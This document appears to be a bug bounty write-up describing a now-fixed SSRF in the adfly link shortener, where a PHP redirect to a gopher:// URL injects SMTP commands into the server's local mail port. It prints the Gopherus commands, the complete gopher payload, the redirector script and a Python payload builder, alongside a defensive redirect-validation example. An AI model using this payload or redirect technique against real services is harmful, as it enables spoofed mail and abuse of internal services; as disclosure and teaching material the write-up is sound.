Gain adfly SMTP access with SSRF via Gopher Protocol

Zerb0a
Jun 27 · 2 min read

Hi guys, my name is Rafli Pasya. Today I want to share my story about an SSRF on adfly. I found this bug 4 days ago and it is already fixed.

Two months ago I found an IDOR on adfly, and 4 days ago I found an SSRF on adfly. Using this vulnerability I was able to send an email through adfly's own SMTP server. It would be absolutely dangerous if another hacker used this to attack adfly's users.

Exploitation

I prepared these tools:
1. Gopherus
2. A server to host a PHP file

First of all I tried to shorten a gopher:// URL directly, but it was blocked by the server. So I made a PHP file that redirects to the Gopherus payload, and that actually worked.

I opened a CMD and typed:
gopherus.py --exploit fastcgi
This is used to exploit FastCGI and gain RCE. Unfortunately, because I was unable to see the response body (only the <title> tag), this exploit did not work.

So I tried the SMTP exploit instead:
gopherus.py --exploit smtp
From Mail : adf@ly
To Mail : [myemail@.x.y]
Subject: PoCSSRF
Text: [empty]

Payload :
gopher://127.0.0.1:25/_MAIL%20FROM:adf%40ly%0ARCPT%20To:myemail%0ADATA%0AFrom:adf%40ly%0ASubject:PoCSSRF%0AMessage:%0A.

Now I made a PHP file:

<?php
// Redirect the shortener's URL fetcher to the Gopherus SMTP payload.
// The gopher:// scheme was blocked in the submitted URL, but not on the redirect target.
header('Location: gopher://127.0.0.1:25/_MAIL%20FROM:adf%40ly%0ARCPT%20To:myemail%0ADATA%0AFrom:adf%40ly%0ASubject:PoCSSRF%0AMessage:%0A.');
?>

and uploaded it to my server.

Then I visited the adfly site and shortened myserver.com/poc.php.

After 1–5 minutes I checked my inbox and saw an email from adf@ly.adf.ly.
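To make the injection concrete, here is an added Python example (mine, not part of the original post and not Gopherus code) that builds the same gopher:// URL in the layout Gopherus uses for its SMTP session, decodes it back into the bytes a Gopher client writes to port 25, and walks those bytes the way a lenient SMTP server would. The point it shows is that every %0A in the URL becomes a new SMTP command line, so a fetcher that speaks gopher:// to localhost is an open relay. The template, the parser and the function names are my own simplifications for illustration.

```python
from urllib.parse import quote, unquote, urlsplit

# Layout of the SMTP session as Gopherus emits it (simplified, assumed):
# each "\n" becomes a separate line on the wire, i.e. a separate SMTP command.
SMTP_TEMPLATE = (
    "MAIL FROM:{sender}\n"
    "RCPT To:{recipient}\n"
    "DATA\n"
    "From:{sender}\n"
    "Subject:{subject}\n"
    "Message:{body}\n"
    "."
)


def build_gopher_smtp_url(host, port, sender, recipient, subject, body=""):
    """Wrap an SMTP session in a gopher:// URL.

    A Gopher URL is gopher://host:port/<type><selector>; Gopherus uses '_' as a
    placeholder item type, and the selector is sent verbatim to the socket.
    ':' and '.' are kept literal (as in the post's payload); ' ', '@' and '\\n'
    are percent-encoded.
    """
    session = SMTP_TEMPLATE.format(sender=sender, recipient=recipient,
                                   subject=subject, body=body)
    return f"gopher://{host}:{port}/_{quote(session, safe=':')}"


def gopher_selector_bytes(url):
    """Bytes a Gopher client writes for this URL: the URL-decoded selector
    (everything after '/' and the one-character item type) followed by CRLF,
    per RFC 1436. No network is touched here.
    """
    parts = urlsplit(url)
    if parts.scheme != "gopher":
        raise ValueError("not a gopher:// URL")
    selector = unquote(parts.path[2:])      # drop '/' and the item type char
    return selector.encode() + b"\r\n"


def parse_smtp_commands(raw):
    """Walk the injected bytes like a lenient SMTP server (no HELO required,
    no replies modelled) and return the envelope and message it would accept.
    """
    sender, recipients, data, in_data = None, [], [], False
    for line in raw.decode().split("\n"):
        line = line.rstrip("\r")
        if in_data:
            if line == ".":             # lone dot terminates DATA
                in_data = False
            else:
                data.append(line)
            continue
        upper = line.upper()
        if upper.startswith("MAIL FROM:"):
            sender = line[len("MAIL FROM:"):].strip()
        elif upper.startswith("RCPT TO:"):
            recipients.append(line[len("RCPT TO:"):].strip())
        elif upper == "DATA":
            in_data = True
    return {"sender": sender, "recipients": recipients, "data": data}


if __name__ == "__main__":
    # Values from the post: sender adf@ly, recipient placeholder "myemail".
    url = build_gopher_smtp_url("127.0.0.1", 25, "adf@ly", "myemail", "PoCSSRF")
    print(url)
    print(parse_smtp_commands(gopher_selector_bytes(url)))
```

Running it reproduces the post's payload string byte for byte, and the parsed result shows why the blind SSRF still "works" without seeing any response: the SMTP server accepts the commands regardless of whether the client reads the replies.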

I quickly reported this bug to their team. It was fixed one day after I reported it.
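The post does not say how adfly fixed it, so here is an added Python example (mine, not adfly's code) of the check a practitioner would want in a URL fetcher: validate the scheme, port and address of every redirect hop, not only the URL the user submitted, since a scheme filter on the first URL alone is exactly what the PHP redirector above gets around. The policy, the helper names and the canned responses are assumptions made for the illustration; hostnames are assumed to be resolved and re-checked by the caller at connect time (DNS rebinding is out of scope here).

```python
import ipaddress
from urllib.parse import urlsplit

# Hypothetical fetch policy for a URL shortener: public web only.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}
MAX_HOPS = 3


def check_target(url):
    """Return None if the URL may be fetched, otherwise the reason it may not."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return f"scheme {parts.scheme!r} not allowed"
    if not parts.hostname:
        return "missing host"
    try:
        port = parts.port
    except ValueError:
        return "invalid port"
    port = port or (443 if parts.scheme.lower() == "https" else 80)
    if port not in ALLOWED_PORTS:
        return f"port {port} not allowed"
    try:
        ip = ipaddress.ip_address(parts.hostname)
    except ValueError:
        return None                 # a hostname, not an IP literal (see lead-in)
    if not ip.is_global:            # loopback, private, link-local, ...
        return f"non-public address {ip}"
    return None


def fetch_following_redirects(fetch, url, max_hops=MAX_HOPS):
    """Apply check_target() on every hop, not just the first URL.

    `fetch(url)` returns (status, headers, body) and must NOT follow redirects
    itself (e.g. requests.get(url, allow_redirects=False)); header names are
    assumed already normalised to "Location".
    """
    for _ in range(max_hops + 1):
        reason = check_target(url)
        if reason:
            raise ValueError(f"refusing {url}: {reason}")
        status, headers, body = fetch(url)
        if status in (301, 302, 303, 307, 308) and "Location" in headers:
            url = headers["Location"]
            continue
        return status, body
    raise ValueError("too many redirects")


# Constructed responses standing in for the attacker's server; no network.
GOPHER_PAYLOAD = ("gopher://127.0.0.1:25/_MAIL%20FROM:adf%40ly%0ARCPT%20To:myemail"
                  "%0ADATA%0AFrom:adf%40ly%0ASubject:PoCSSRF%0AMessage:%0A.")
FAKE_RESPONSES = {
    "http://myserver.example/poc.php": (302, {"Location": GOPHER_PAYLOAD}, b""),
    "http://myserver.example/ok.html": (200, {}, b"<title>ok</title>"),
}


def fake_fetch(url):
    return FAKE_RESPONSES[url]


def try_fetch(url):
    """Run the guarded fetch and report the outcome as a string."""
    try:
        status, _body = fetch_following_redirects(fake_fetch, url)
        return f"fetched {status}"
    except ValueError as exc:
        return str(exc)


if __name__ == "__main__":
    print(try_fetch("http://myserver.example/ok.html"))
    print(try_fetch("http://myserver.example/poc.php"))
```

The redirect to gopher://127.0.0.1:25 is refused at the second hop, while a plain page on the same attacker host is still fetched; the same check also stops direct hits on loopback, RFC 1918 and link-local literals.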

Thanks for reading, sorry for my bad English btw.

Original WriteUp :
https://raflipasya19.blogspot.com/2019/06/adfly-ssrf-to-smtp-takeover.html

Timeline :

- Sunday 23 June 2019 23:35 GMT+7 = Bug Found & Reported

- Monday 24 June 2019 17:16 GMT+7 = Triaged

- Monday 24 June 2019 22:34 GMT+7 = Bug Fixed

Blog: https://raflipasya19.blogspot.com